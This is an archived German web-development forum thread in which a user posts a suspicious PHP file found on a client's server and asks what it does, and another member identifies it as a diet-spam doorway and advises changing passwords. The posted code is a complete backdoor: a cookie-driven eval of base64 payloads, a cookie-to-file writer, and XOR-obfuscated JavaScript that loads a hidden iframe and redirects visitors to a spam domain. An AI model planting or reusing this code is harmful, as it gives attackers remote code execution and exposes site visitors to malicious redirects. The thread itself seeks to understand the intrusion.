Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Suspekte PHP-Dateien auf Server

Ajax, Hijax, Microformats, RDF, Markup, HTML, PHP, CSS, MySQL, htaccess, robots.txt, CGI, Java, Javascript usw.
Neues Thema Antworten
bogumir
PostRank 4
PostRank 4
Beiträge: 144
Registriert: 17.03.2007, 14:56
Wohnort: jenseits von gut und böse

Beitrag von bogumir » 05.08.2013, 06:19

Bei einem Kunden habe ich am Server ca. 40 gleiche, aber verschieden genannte PHP-Dateien gefunden, welche mir ziemlich suspekt erscheinen, insbesondere., weil niemand weiß wie die dort hin gekommen sind.

Ich habe eine davon unten eingestellt, kann mir wer sagen, was das ist?

Code: Alles auswählen


<?php
if&#40;isset&#40;$_COOKIE&#91;'ggm'&#93;&#41;&#41;&#123;ob_start&#40;&#41;;$b=strrev&#40;"edoced_4"."6esab"&#41;;eval&#40;$b&#40;$_COOKIE&#91;'ggm'&#93;&#41;&#41;;setcookie&#40;$_COOKIE&#91;'ggn'&#93;,$_COOKIE&#91;'ggp'&#93;.base64_encode&#40;ob_get_contents&#40;&#41;&#41;.$_COOKIE&#91;'ggp'&#93;&#41;;ob_end_clean&#40;&#41;;&#125;
if&#40;isset&#40;$_COOKIE&#91;'f'&#93;&#41;&#41;&#123; file_put_contents&#40;"f.txt", $_COOKIE&#91;'f'&#93;&#41;; &#125;
if&#40;isset&#40;$_GET&#91;'i'&#93;&#41;&#41;&#123; $name = './foxlogo.jpg'; $fp = fopen&#40;$name, 'rb'&#41;; header&#40;"Content-Type&#58; image/jpeg"&#41;; header&#40;"Content-Length&#58; " . filesize&#40;$name&#41;&#41;; fpassthru&#40;$fp&#41;; exit; &#125;

		function rand_string&#40; $length &#41; &#123;
			$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
			$size = strlen&#40; $chars &#41;;
			$str = "";
			for&#40; $i = 0; $i < $length; $i++ &#41; &#123;
				$str .= $chars&#91; rand&#40; 0, $size - 1 &#41; &#93;;
			&#125;
			return $str;
		&#125;

		$prefix="m";
	$titles = array&#40;"Lose 1-2 Pounds Daily! Permanently!","No Hunger Pains, Maintain Muscle Tone, Feel Great!","Equally as Effective as Clinical Injections. Save Money & NO Pain!","Made in the USA! FDA Compliant! All Natural & Completely Safe!","Raspberry Ultra is YOUR Solution! Guaranteed Results!","America Top Diet Trends","The best Diet","Top Diet"&#41;;
	$title = $titles&#91;array_rand&#40;$titles&#41;&#93;;
	$img_link = "http&#58;//".$_SERVER&#91;"HTTP_HOST"&#93;."/".$prefix."/".rand_string&#40;10&#41;.".jpg";
	$waits = array&#40;"Wait please...", "Open...", "........", "1 second!","...","Please, wait!"&#41;;
	$wait = $waits&#91;array_rand&#40;$waits&#41;&#93;;



function xo&#40; $text, $xorKey &#41; &#123;
$xored = '';
$chars = str_split&#40; $text &#41;;
$i = 0;
while &#40; $i < count&#40; $chars &#41; &#41; &#123;
 $xored .= chr&#40; ord&#40; $chars&#91;$i&#93; &#41; ^ $xorKey &#41;;
 $i++;
&#125;
return rawurlencode&#40;$xored&#41;;
&#125;
$magickword = "a".rand_string&#40;5&#41;;
$x=rand&#40;1,99&#41;;
$bitly="<iframe src='http&#58;//bit.ly/W2HpQg' width='1' height='1' frameborder='0'></iframe>";
 $redir = "<script>function delayer&#40;&#41;&#123;window.location = 'http&#58;//best.diet.news.2013.for.lose.".rand&#40;1,5&#41;.".pound.xcfox.com/?s=daidu16'&#125;; setTimeout&#40;'delayer&#40;&#41;', 200&#41;;</script>";
?><!DOCTYPE HTML>
<html><head><title><?php echo $title; ?></title>
<meta property="og&#58;title" content="<?php echo $title; ?>"/>
<meta property="og&#58;type" content="article"/>
<meta property="og&#58;url" content="<?php echo "http&#58;//".$_SERVER&#91;"HTTP_HOST"&#93;.$_SERVER&#91;"SCRIPT_NAME"&#93; ?>"/>
<meta property="og&#58;site_name" content="<?php echo $_SERVER&#91;"HTTP_HOST"&#93; ?>"/>
<meta property="og&#58;image" content="<?php echo "http&#58;//".$_SERVER&#91;"HTTP_HOST"&#93;.$_SERVER&#91;"SCRIPT_NAME"&#93;."?i=".rand_string&#40;10&#41;.".jpg" ?>"/>
<script>function <?= $magickword ?>&#40;s&#41; &#123; var key=<?= $x ?>; var str = decodeURIComponent&#40;s&#41;; var xored = ""; for &#40;i=0; i<str.length;i++&#41; &#123; var a = str.charCodeAt&#40;i&#41;; var b = a ^ key; xored = xored+String.fromCharCode&#40;b&#41;; &#125; document.write&#40;xored&#41;; return xored; &#125;;
</script>
</head><body id="<?= rand_string&#40;50&#41; ?>"  >
<h1 id="<?= rand_string&#40;50&#41; ?>"><script><?= $magickword ?>&#40;'<?= xo&#40; $wait, $x &#41; ?>'&#41;;</script></h1>
<script><?= $magickword ?>&#40;'<?= xo&#40; $bitly, $x &#41; ?>'&#41;;</script><script><?= $magickword ?>&#40;'<?= xo&#40; $redir, $x &#41; ?>'&#41;;</script></body></html>


Anzeige von ABAKUS

von Anzeige von ABAKUS »

Content Erstellung von ABAKUS Internet Marketing
Ihre Vorteile:
  • einzigartige Texte
  • suchmaschinenoptimierte Inhalte
  • eine sinnvolle Content-Strategie
  • Beratung und Umsetzung
Jetzt anfragen: 0511 / 300325-0

ElDiablo
PostRank 9
PostRank 9
Beiträge: 1971
Registriert: 27.11.2011, 11:20

Beitrag von ElDiablo » 05.08.2013, 06:59

Also auf den ersten Blick werden Seiten mit diversen Titles generiert, die auf eine Diet-Spam-Seite führen.

Also ändere mal die Passwörter und prüfe alle PCs genau, die FTP oder Shell Zugang hatten.

bogumir
PostRank 4
PostRank 4
Beiträge: 144
Registriert: 17.03.2007, 14:56
Wohnort: jenseits von gut und böse

Beitrag von bogumir » 05.08.2013, 09:15

Danke.

FTP-Zugang gibts nur einen einzigen, von meinem PC